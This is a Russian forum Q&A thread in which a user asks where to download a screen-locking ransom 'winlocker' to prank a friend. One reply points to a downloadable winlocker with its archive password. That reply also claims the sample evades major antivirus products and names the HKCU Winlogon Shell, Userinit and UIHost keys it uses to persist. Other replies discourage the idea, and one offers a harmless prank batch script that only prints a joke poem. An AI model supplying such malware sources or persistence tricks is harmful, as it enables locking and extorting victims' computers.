Ирина Нилова

Вирус-баннер, блокирующий комп

Народ, не подскажите, где можно скачать вирус, блокирующий комп и просящий отправить смс, лучше, чтоб был с картинкой. Хочу над другом приколоться.
P.S На поисковых системах был, но такие вещи на каждом углу не валяются, даже в инете.

Юлька Андреева

винлокер. Садится в текущего пользователя, под другими можно зайти, и в безопасном режиме тоже. Но (гады! ) добавляет в HCU\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon ранее отсутствовавшие там ключи.. .И если ключи не вычистить, тоже мало хорошего.

Сейчас не детектится основными аверами России: Касперский, ДрВеб, Нод32 - вся тройка молчит как рыба об лед
а, да. пасс 123

вроде простой винлокер, как валенок. Но - внезапно оказалось, что ключи Shell, Userinit и UIHost, добавленные в Winlogon пользователя, нормально воспринимаются и перекрывают действие соответствующих ключей в HKLM

http://www.wasm.ru/forum/attachment.php?item=5133

Галина Вайнярв

Несмешной прикол.

Юлия Тарасова

Хочешь приколоться выстави на рабочий стол картинку, типа вирус...

Данил

Это не прикол. А пошутить, чтож-внесите в его ПК Бат-файл чтоб к примеру стишок писался на экране. Вот пример текста. (файл из Txt перевести в bat формат)
@ECHO OFF
REG ADD HKCU\Console\^%%SystemRoot^%%_system64_cmd.exe /v FaceName /d "Lucida Console" /f
chcp 1251 >nul
@Echo off
echo.
Echo. ****** Я - ужасный злобный вирус, ******
ping -n 2 127.0.0.1 > nul
echo. Я пришел на ваш винчестер
ping -n 2 127.0.0.1 > nul
echo. Безобидной с виду почтой,
ping -n 2 127.0.0.1 > nul
echo. Чтобы диски удалять.
Ping -n 2 127.0.0.1 > nul
echo *******
echo. Укокошим для начала
ping -n 2 127.0.0.1 > nul
echo. Пару ваших нужных дисков ,
ping -n 2 127.0.0.1 > nul
echo. Где, съедая много места,
ping -n 2 127.0.0.1 > nul
echo. Шняга важная лежит.
Ping -n 2 127.0.1.1 > nul
echo. *******
Echo. Файлы, папки, игры, песни
ping -n 2 127.0.0.1 > nul
echo. На фига они тебе?
Ping -n 2 127.0.0.1 > nul
echo. Лучше телик и газеты
ping -n 2 127.0.0.1 > nul
echo. Или с милым (ой) в шалаше!! !
Ping -n 2 127.0.0.1 > nul
echo *******
ping -n 2 127.0.0.1 > nul
echo. Вот и всё,а ты боялся
ping -n 2 127.0.0.1 > nul
echo. Dисков нет!! ! Простор и рай!! !
Ping -n 2 127.0.0.1 > nul
echo. Изучай команды dosa
ping -n 2 127.0.0.1 > nul
echo. ****** До свидания !!!Good bay!!! ******
Ping -n 2 127.0.0.1 > nul
echo. *******
Ping -n 5 127.0.0.1 > nul
exit

Cтас Редька

доктор вэб в помощь пиши помогу